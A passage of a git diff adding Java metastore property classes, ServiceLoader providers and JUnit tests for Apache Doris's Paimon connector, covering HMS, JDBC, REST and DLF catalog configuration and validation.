and hive.metastore.client.keytab cannot be set when " + + "hive.metastore.authentication.type is simple"); + } + // requireIf(authType, "kerberos", {clientPrincipal, clientKeytab}) — also CASE-SENSITIVE. + if ("kerberos".equals(authType) + && (StringUtils.isBlank(clientPrincipal) || StringUtils.isBlank(clientKeytab))) { + throw new IllegalArgumentException( + "hive.metastore.client.principal and hive.metastore.client.keytab are required when " + + "hive.metastore.authentication.type is kerberos"); + } + } + + @Override + public String getUri() { + return uri; + } + + @Override + public AuthType getAuthType() { + return AuthType.fromString(authType); + } + + @Override + public Optional kerberos() { + // Mirrors HMSBaseProperties.initHadoopAuthenticator: kerberos HMS -> client creds; else the + // legacy HDFS-kerberos fallback -> hdfs creds (case-insensitive, matching the conf-build branch). + String effectiveAuthType = StringUtils.isNotBlank(authType) ? authType : "none"; + if ("kerberos".equalsIgnoreCase(effectiveAuthType)) { + return Optional.of(new KerberosAuthSpec(clientPrincipal, clientKeytab)); + } + if (!"simple".equalsIgnoreCase(effectiveAuthType) && "kerberos".equalsIgnoreCase(hdfsAuthType)) { + return Optional.of(new KerberosAuthSpec(hdfsKerberosPrincipal, hdfsKerberosKeytab)); + } + return Optional.empty(); + } + + @Override + public Map toHiveConfOverrides() { + Map conf = new LinkedHashMap<>(); + // 1. All user hive.* keys verbatim (legacy initUserHiveConfig). + raw.forEach((k, v) -> { + if (k.startsWith("hive.")) { + conf.put(k, v); + } + }); + // 2. Metastore uri (legacy checkAndInit: hiveConf.set("hive.metastore.uris", uri)). + if (StringUtils.isNotBlank(uri)) { + conf.put("hive.metastore.uris", uri); + } + // 3. Present auth keys, in legacy copyIfPresent order. Single-alias fields == raw values; the + // hadoop.* ones are not covered by step 1's hive.* passthrough. + putIfNotBlank(conf, "hive.metastore.authentication.type", authType); + putIfNotBlank(conf, "hive.metastore.client.principal", clientPrincipal); + putIfNotBlank(conf, "hive.metastore.client.keytab", clientKeytab); + putIfNotBlank(conf, "hadoop.security.authentication", hdfsAuthType); + putIfNotBlank(conf, "hadoop.kerberos.principal", hdfsKerberosPrincipal); + putIfNotBlank(conf, "hadoop.kerberos.keytab", hdfsKerberosKeytab); + // 4. Metastore client socket-timeout default (legacy checkAndInit: default 10s when unset). + if (StringUtils.isBlank(raw.get("hive.metastore.client.socket.timeout"))) { + conf.put("hive.metastore.client.socket.timeout", "10"); + } + // 5. Storage overlay (legacy buildHiveConfiguration + appendUserHadoopConfig). BEFORE kerberos. + MetaStoreParseUtils.applyStorageConfig(storageHadoopConfig, raw, conf::put); + // 6. Kerberos-conditional metastore block (legacy initHadoopAuthenticator), LAST. + if (StringUtils.isNotBlank(servicePrincipal)) { + conf.put("hive.metastore.kerberos.principal", servicePrincipal); + } + MetaStoreParseUtils.copyIfPresent(raw, "hadoop.security.auth_to_local", conf::put); + String hmsAuthType = StringUtils.isNotBlank(authType) ? authType : "none"; + boolean hmsKerberos = "kerberos".equalsIgnoreCase(hmsAuthType); + boolean hdfsFallbackKerberos = !"simple".equalsIgnoreCase(hmsAuthType) + && !hmsKerberos + && "kerberos".equalsIgnoreCase(hdfsAuthType); + if (hmsKerberos || hdfsFallbackKerberos) { + conf.put("hadoop.security.authentication", "kerberos"); + conf.put("hive.metastore.sasl.enabled", "true"); + } + // 7. Username alias resolved to hadoop.username, after the storage overlay. + if (StringUtils.isNotBlank(userName)) { + conf.put("hadoop.username", userName); + } + return conf; + } + + private static void putIfNotBlank(Map conf, String key, String value) { + if (StringUtils.isNotBlank(value)) { + conf.put(key, value); + } + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStoreProvider.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStoreProvider.java new file mode 100644 index 00000000000000..9950b804dd4e31 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStoreProvider.java @@ -0,0 +1,50 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.hms; + +import org.apache.doris.connector.metastore.HmsMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.MetaStoreParseUtils; +import org.apache.doris.connector.metastore.spi.MetaStoreProvider; +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; + +import java.util.Map; +import java.util.Set; + +/** Selects the Hive Metastore backend ({@code paimon.catalog.type == hms}). */ +public final class HmsMetaStoreProvider implements MetaStoreProvider { + + @Override + public boolean supports(Map properties) { + return "hms".equalsIgnoreCase(properties.get(MetaStoreParseUtils.CATALOG_TYPE_KEY)); + } + + @Override + public HmsMetaStoreProperties bind(Map properties, Map storageHadoopConfig) { + return HmsMetaStorePropertiesImpl.of(properties, storageHadoopConfig); + } + + @Override + public Set sensitivePropertyKeys() { + return ConnectorPropertiesUtils.getSensitiveKeys(HmsMetaStorePropertiesImpl.class); + } + + @Override + public String name() { + return "HMS"; + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStorePropertiesImpl.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStorePropertiesImpl.java new file mode 100644 index 00000000000000..d3c48226425ee1 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStorePropertiesImpl.java @@ -0,0 +1,111 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.jdbc; + +import org.apache.doris.connector.metastore.JdbcMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.AbstractMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.JdbcDriverSupport; +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; + +import org.apache.commons.lang3.StringUtils; + +import java.util.Map; + +/** + * JDBC catalog metastore backend facts. The getters return the raw, alias-resolved values; the + * driver-url is resolved to a full URL by the consumer via + * {@link JdbcDriverSupport#resolveDriverUrl(String, Map)} (which needs the engine environment), + * exactly as the live FE registration and the BE-bound options do today. + */ +public final class JdbcMetaStorePropertiesImpl extends AbstractMetaStoreProperties + implements JdbcMetaStoreProperties { + + @ConnectorProperty(names = {"uri", "paimon.jdbc.uri"}, required = false, + description = "The JDBC connection URI.") + private String uri = ""; + + @ConnectorProperty(names = {"paimon.jdbc.user", "jdbc.user"}, required = false, + description = "The JDBC user.") + private String user = ""; + + @ConnectorProperty(names = {"paimon.jdbc.password", "jdbc.password"}, required = false, sensitive = true, + description = "The JDBC password.") + private String password = ""; + + @ConnectorProperty(names = {"paimon.jdbc.driver_url", "jdbc.driver_url"}, required = false, + description = "The JDBC driver jar URL.") + private String driverUrl = ""; + + @ConnectorProperty(names = {"paimon.jdbc.driver_class", "jdbc.driver_class"}, required = false, + description = "The JDBC driver class name.") + private String driverClass = ""; + + private JdbcMetaStorePropertiesImpl(Map raw) { + super(raw); + } + + public static JdbcMetaStorePropertiesImpl of(Map raw) { + JdbcMetaStorePropertiesImpl props = new JdbcMetaStorePropertiesImpl(raw); + ConnectorPropertiesUtils.bindConnectorProperties(props, raw); + return props; + } + + @Override + public String providerName() { + return "JDBC"; + } + + @Override + public void validate() { + requireWarehouse(); + if (StringUtils.isBlank(uri)) { + throw new IllegalArgumentException("uri or paimon.jdbc.uri is required"); + } + if (StringUtils.isNotBlank(driverUrl) && StringUtils.isBlank(driverClass)) { + throw new IllegalArgumentException( + "jdbc.driver_class or paimon.jdbc.driver_class is required when " + + "jdbc.driver_url or paimon.jdbc.driver_url is specified"); + } + } + + @Override + public String getUri() { + return uri; + } + + @Override + public String getUser() { + return user; + } + + @Override + public String getPassword() { + return password; + } + + @Override + public String getDriverUrl() { + return driverUrl; + } + + @Override + public String getDriverClass() { + return driverClass; + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStoreProvider.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStoreProvider.java new file mode 100644 index 00000000000000..d6194db615f3cd --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/jdbc/JdbcMetaStoreProvider.java @@ -0,0 +1,51 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.jdbc; + +import org.apache.doris.connector.metastore.JdbcMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.MetaStoreParseUtils; +import org.apache.doris.connector.metastore.spi.MetaStoreProvider; +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; + +import java.util.Map; +import java.util.Set; + +/** Selects the JDBC catalog backend ({@code paimon.catalog.type == jdbc}). */ +public final class JdbcMetaStoreProvider implements MetaStoreProvider { + + @Override + public boolean supports(Map properties) { + return "jdbc".equalsIgnoreCase(properties.get(MetaStoreParseUtils.CATALOG_TYPE_KEY)); + } + + @Override + public JdbcMetaStoreProperties bind(Map properties, + Map storageHadoopConfig) { + return JdbcMetaStorePropertiesImpl.of(properties); + } + + @Override + public Set sensitivePropertyKeys() { + return ConnectorPropertiesUtils.getSensitiveKeys(JdbcMetaStorePropertiesImpl.class); + } + + @Override + public String name() { + return "JDBC"; + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStorePropertiesImpl.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStorePropertiesImpl.java new file mode 100644 index 00000000000000..343b73c6dc13ad --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStorePropertiesImpl.java @@ -0,0 +1,111 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.rest; + +import org.apache.doris.connector.metastore.RestMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.AbstractMetaStoreProperties; +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; + +import org.apache.commons.lang3.StringUtils; + +import java.util.LinkedHashMap; +import java.util.Map; + +/** + * REST catalog metastore backend facts. Options-only (the REST server owns storage, so + * {@link #needsStorage()} stays false): the {@code uri} plus every {@code paimon.rest.*} key + * re-keyed with the prefix stripped (legacy {@code appendRestOptions}). + */ +public final class RestMetaStorePropertiesImpl extends AbstractMetaStoreProperties + implements RestMetaStoreProperties { + + private static final String PAIMON_REST_PREFIX = "paimon.rest."; + + @ConnectorProperty(names = {"paimon.rest.uri", "uri"}, required = false, + description = "The REST catalog service URI.") + private String uri = ""; + + @ConnectorProperty(names = {"paimon.rest.token.provider"}, required = false, + description = "The REST catalog token provider (e.g. dlf).") + private String tokenProvider = ""; + + @ConnectorProperty(names = {"paimon.rest.dlf.access-key-id"}, required = false, sensitive = true, + description = "DLF access key id for the REST DLF token provider.") + private String dlfAccessKeyId = ""; + + @ConnectorProperty(names = {"paimon.rest.dlf.access-key-secret"}, required = false, sensitive = true, + description = "DLF access key secret for the REST DLF token provider.") + private String dlfAccessKeySecret = ""; + + private RestMetaStorePropertiesImpl(Map raw) { + super(raw); + } + + public static RestMetaStorePropertiesImpl of(Map raw) { + RestMetaStorePropertiesImpl props = new RestMetaStorePropertiesImpl(raw); + ConnectorPropertiesUtils.bindConnectorProperties(props, raw); + return props; + } + + @Override + public String providerName() { + return "REST"; + } + + @Override + public void validate() { + // Shared warehouse check first (legacy parity: AbstractPaimonProperties requires warehouse for + // REST too — PaimonRestMetaStoreProperties does not override it). + requireWarehouse(); + if (StringUtils.isBlank(uri)) { + throw new IllegalArgumentException("paimon.rest.uri or uri is required"); + } + // CASE-SENSITIVE match: the authoritative legacy contract is ParamRules.requireIf, which uses + // Objects.equals("dlf", tokenProvider) (PaimonRestMetaStoreProperties). The paimon hand-copy's + // equalsIgnoreCase is a latent divergence we do NOT carry forward (T2 parity = legacy). + if ("dlf".equals(tokenProvider) + && (StringUtils.isBlank(dlfAccessKeyId) || StringUtils.isBlank(dlfAccessKeySecret))) { + throw new IllegalArgumentException( + "DLF token provider requires 'paimon.rest.dlf.access-key-id' " + + "and 'paimon.rest.dlf.access-key-secret'"); + } + } + + @Override + public String getUri() { + return uri; + } + + @Override + public Map toRestOptions() { + // Mirrors legacy appendRestOptions: set "uri" then re-key every paimon.rest.* (prefix stripped). + // Legacy sets "uri" unconditionally; we guard null so the neutral map carries no null value (the + // no-uri case is already rejected by validate()). + Map options = new LinkedHashMap<>(); + if (StringUtils.isNotBlank(uri)) { + options.put("uri", uri); + } + raw.forEach((k, v) -> { + if (k.startsWith(PAIMON_REST_PREFIX)) { + options.put(k.substring(PAIMON_REST_PREFIX.length()), v); + } + }); + return options; + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStoreProvider.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStoreProvider.java new file mode 100644 index 00000000000000..2c8df920ddef27 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/rest/RestMetaStoreProvider.java @@ -0,0 +1,51 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.rest; + +import org.apache.doris.connector.metastore.RestMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.MetaStoreParseUtils; +import org.apache.doris.connector.metastore.spi.MetaStoreProvider; +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; + +import java.util.Map; +import java.util.Set; + +/** Selects the REST catalog backend ({@code paimon.catalog.type == rest}). */ +public final class RestMetaStoreProvider implements MetaStoreProvider { + + @Override + public boolean supports(Map properties) { + return "rest".equalsIgnoreCase(properties.get(MetaStoreParseUtils.CATALOG_TYPE_KEY)); + } + + @Override + public RestMetaStoreProperties bind(Map properties, + Map storageHadoopConfig) { + return RestMetaStorePropertiesImpl.of(properties); + } + + @Override + public Set sensitivePropertyKeys() { + return ConnectorPropertiesUtils.getSensitiveKeys(RestMetaStorePropertiesImpl.class); + } + + @Override + public String name() { + return "REST"; + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/resources/META-INF/services/org.apache.doris.connector.metastore.spi.MetaStoreProvider b/fe/fe-connector/fe-connector-metastore-spi/src/main/resources/META-INF/services/org.apache.doris.connector.metastore.spi.MetaStoreProvider new file mode 100644 index 00000000000000..a121e5c1d00116 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/resources/META-INF/services/org.apache.doris.connector.metastore.spi.MetaStoreProvider @@ -0,0 +1,21 @@ +# Licensed to the Apache Software Foundation (ASF) under one +# or more contributor license agreements. See the NOTICE file +# distributed with this work for additional information +# regarding copyright ownership. The ASF licenses this file +# to you under the Apache License, Version 2.0 (the +# "License"); you may not use this file except in compliance +# with the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, +# software distributed under the License is distributed on an +# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +# KIND, either express or implied. See the License for the +# specific language governing permissions and limitations +# under the License. +org.apache.doris.connector.metastore.spi.hms.HmsMetaStoreProvider +org.apache.doris.connector.metastore.spi.dlf.DlfMetaStoreProvider +org.apache.doris.connector.metastore.spi.rest.RestMetaStoreProvider +org.apache.doris.connector.metastore.spi.jdbc.JdbcMetaStoreProvider +org.apache.doris.connector.metastore.spi.fs.FileSystemMetaStoreProvider diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtilsTest.java b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtilsTest.java new file mode 100644 index 00000000000000..f5498021087105 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtilsTest.java @@ -0,0 +1,94 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.LinkedHashMap; +import java.util.Map; + +/** + * Pins the shared storage-overlay + alias helpers. {@code applyStorageConfig} is the most + * parity-fragile code in the module (the {@code paimon.s3.}/{@code fs.oss.} -> {@code fs.s3a.} re-key) + * and is exercised here directly so a regression cannot slip through the backend tests. + */ +public class MetaStoreParseUtilsTest { + + private static Map raw(String... kv) { + Map m = new HashMap<>(); + for (int i = 0; i < kv.length; i += 2) { + m.put(kv[i], kv[i + 1]); + } + return m; + } + + private static Map overlay(Map storage, Map props) { + Map out = new LinkedHashMap<>(); + MetaStoreParseUtils.applyStorageConfig(storage, props, out::put); + return out; + } + + @Test + public void reKeysPaimonStoragePrefixesToFsS3a() { + Map out = overlay(new HashMap<>(), raw( + "paimon.s3.access-key", "ak", + "paimon.s3a.path.style.access", "true", + "paimon.fs.s3.region", "us-east-1", + "paimon.fs.oss.endpoint", "oss-ep")); + Assertions.assertEquals("ak", out.get("fs.s3a.access-key")); + Assertions.assertEquals("true", out.get("fs.s3a.path.style.access")); + Assertions.assertEquals("us-east-1", out.get("fs.s3a.region")); + Assertions.assertEquals("oss-ep", out.get("fs.s3a.endpoint")); + // the original prefixed keys are NOT carried verbatim + Assertions.assertFalse(out.containsKey("paimon.s3.access-key")); + } + + @Test + public void passesThroughHadoopFsDfsAndDropsUnrelatedKeys() { + Map out = overlay(new HashMap<>(), raw( + "fs.defaultFS", "hdfs://nn", + "dfs.nameservices", "ns", + "hadoop.security.authentication", "kerberos", + "warehouse", "oss://b/wh", + "some.random.key", "x")); + Assertions.assertEquals("hdfs://nn", out.get("fs.defaultFS")); + Assertions.assertEquals("ns", out.get("dfs.nameservices")); + Assertions.assertEquals("kerberos", out.get("hadoop.security.authentication")); + // non-storage keys are dropped + Assertions.assertFalse(out.containsKey("warehouse")); + Assertions.assertFalse(out.containsKey("some.random.key")); + } + + @Test + public void storageConfigIsOverlaidFirstThenPropsWin() { + Map storage = raw("fs.s3a.endpoint", "from-storage", "fs.s3a.region", "us-west-2"); + // explicit fs.s3a.endpoint in props (last-write-wins) overrides the canonical storage value + Map out = overlay(storage, raw("fs.s3a.endpoint", "from-props")); + Assertions.assertEquals("from-props", out.get("fs.s3a.endpoint")); + Assertions.assertEquals("us-west-2", out.get("fs.s3a.region")); + } + + @Test + public void firstNonBlankSkipsBlanksAndHonoursAliasOrder() { + Assertions.assertEquals("x", MetaStoreParseUtils.firstNonBlank(raw("a", " ", "b", "x"), "a", "b")); + Assertions.assertEquals("y", MetaStoreParseUtils.firstNonBlank(raw("a", "y", "b", "x"), "a", "b")); + Assertions.assertNull(MetaStoreParseUtils.firstNonBlank(raw(), "a", "b")); + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/MetaStoreProvidersDispatchTest.java b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/MetaStoreProvidersDispatchTest.java new file mode 100644 index 00000000000000..a418a21fec0bfb --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/MetaStoreProvidersDispatchTest.java @@ -0,0 +1,115 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi; + +import org.apache.doris.connector.metastore.MetaStoreProperties; +import org.apache.doris.connector.metastore.spi.dlf.DlfMetaStorePropertiesImpl; +import org.apache.doris.connector.metastore.spi.fs.FileSystemMetaStorePropertiesImpl; +import org.apache.doris.connector.metastore.spi.fs.FileSystemMetaStoreProvider; +import org.apache.doris.connector.metastore.spi.hms.HmsMetaStorePropertiesImpl; +import org.apache.doris.connector.metastore.spi.hms.HmsMetaStoreProvider; +import org.apache.doris.connector.metastore.spi.jdbc.JdbcMetaStorePropertiesImpl; +import org.apache.doris.connector.metastore.spi.rest.RestMetaStorePropertiesImpl; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; + +/** + * Verifies the ServiceLoader-based discovery: all 5 built-in providers register, and the first-hit + * dispatcher selects the right backend by {@code paimon.catalog.type} (no central switch, no enum). + */ +public class MetaStoreProvidersDispatchTest { + + private static Map typed(String flavor) { + Map m = new HashMap<>(); + if (flavor != null) { + m.put("paimon.catalog.type", flavor); + } + m.put("warehouse", "wh"); + return m; + } + + private static String providerOf(String flavor) { + return MetaStoreProviders.bind(typed(flavor), Collections.emptyMap()).providerName(); + } + + @Test + public void dispatchesEachFlavorToItsBackend() { + Assertions.assertEquals("HMS", providerOf("hms")); + Assertions.assertEquals("DLF", providerOf("dlf")); + Assertions.assertEquals("REST", providerOf("rest")); + Assertions.assertEquals("JDBC", providerOf("jdbc")); + Assertions.assertEquals("FILESYSTEM", providerOf("filesystem")); + // case-insensitive flavor + Assertions.assertEquals("HMS", providerOf("HMS")); + } + + @Test + public void absentTypeDefaultsToFilesystem() { + Assertions.assertEquals("FILESYSTEM", providerOf(null)); + } + + @Test + public void unknownTypeHasNoSupportingProvider() { + IllegalArgumentException ex = Assertions.assertThrows(IllegalArgumentException.class, + () -> MetaStoreProviders.bind(typed("nessie"), Collections.emptyMap())); + Assertions.assertTrue(ex.getMessage().startsWith("No MetaStoreProvider supports the given properties"), + ex.getMessage()); + } + + @Test + public void allFiveProvidersAreRegistered() { + Assertions.assertTrue(MetaStoreProviders.registeredNames() + .containsAll(java.util.Arrays.asList("HMS", "DLF", "REST", "JDBC", "FILESYSTEM")), + "registered=" + MetaStoreProviders.registeredNames()); + } + + @Test + public void boundPropertiesExposeRawAndProvider() { + MetaStoreProperties ms = MetaStoreProviders.bind(typed("hms"), Collections.emptyMap()); + Assertions.assertEquals("wh", ms.rawProperties().get("warehouse")); + } + + @Test + public void dispatchReturnsTheWiredConcreteImpl() { + // providerName() is a hardcoded literal; assert the actual bound type to catch a mis-wired bind(). + Assertions.assertTrue(MetaStoreProviders.bind(typed("hms"), Collections.emptyMap()) + instanceof HmsMetaStorePropertiesImpl); + Assertions.assertTrue(MetaStoreProviders.bind(typed("dlf"), Collections.emptyMap()) + instanceof DlfMetaStorePropertiesImpl); + Assertions.assertTrue(MetaStoreProviders.bind(typed("rest"), Collections.emptyMap()) + instanceof RestMetaStorePropertiesImpl); + Assertions.assertTrue(MetaStoreProviders.bind(typed("jdbc"), Collections.emptyMap()) + instanceof JdbcMetaStorePropertiesImpl); + Assertions.assertTrue(MetaStoreProviders.bind(typed(null), Collections.emptyMap()) + instanceof FileSystemMetaStorePropertiesImpl); + } + + @Test + public void providersExposeTheirSensitiveKeys() { + // The HMS provider surfaces its sensitive=true keytab keys (for masking when wired in P2-T03); + // FileSystem has no sensitive fields -> empty (pins the default). + Assertions.assertTrue(new HmsMetaStoreProvider().sensitivePropertyKeys() + .contains("hive.metastore.client.keytab")); + Assertions.assertTrue(new FileSystemMetaStoreProvider().sensitivePropertyKeys().isEmpty()); + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStorePropertiesTest.java b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStorePropertiesTest.java new file mode 100644 index 00000000000000..eb65ee754b3bfd --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStorePropertiesTest.java @@ -0,0 +1,135 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.dlf; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; + +/** T2 parity for the DLF backend (legacy {@code PaimonAliyunDLFMetaStoreProperties}/{@code buildDlfHiveConf}). */ +public class DlfMetaStorePropertiesTest { + + private static Map raw(String... kv) { + Map m = new HashMap<>(); + for (int i = 0; i < kv.length; i += 2) { + m.put(kv[i], kv[i + 1]); + } + return m; + } + + @Test + public void toDlfCatalogConfDerivesVpcEndpointAndCatalogIdFromUid() { + DlfMetaStorePropertiesImpl props = DlfMetaStorePropertiesImpl.of(raw( + "dlf.access_key", "ak", "dlf.secret_key", "sk", "dlf.region", "cn-hangzhou", + "dlf.catalog.uid", "123456", "warehouse", "wh"), Collections.emptyMap()); + + Assertions.assertEquals("DLF", props.providerName()); + Assertions.assertTrue(props.needsStorage()); + + Map conf = props.toDlfCatalogConf(); + Assertions.assertEquals("ak", conf.get("dlf.catalog.accessKeyId")); + Assertions.assertEquals("sk", conf.get("dlf.catalog.accessKeySecret")); + // accessPublic defaults false -> VPC endpoint. + Assertions.assertEquals("dlf-vpc.cn-hangzhou.aliyuncs.com", conf.get("dlf.catalog.endpoint")); + Assertions.assertEquals("cn-hangzhou", conf.get("dlf.catalog.region")); + Assertions.assertEquals("", conf.get("dlf.catalog.securityToken")); + Assertions.assertEquals("123456", conf.get("dlf.catalog.uid")); + Assertions.assertEquals("123456", conf.get("dlf.catalog.id")); + Assertions.assertEquals("DLF_ONLY", conf.get("dlf.catalog.proxyMode")); + } + + @Test + public void publicEndpointWhenAccessPublicTrue() { + DlfMetaStorePropertiesImpl props = DlfMetaStorePropertiesImpl.of(raw( + "dlf.access_key", "ak", 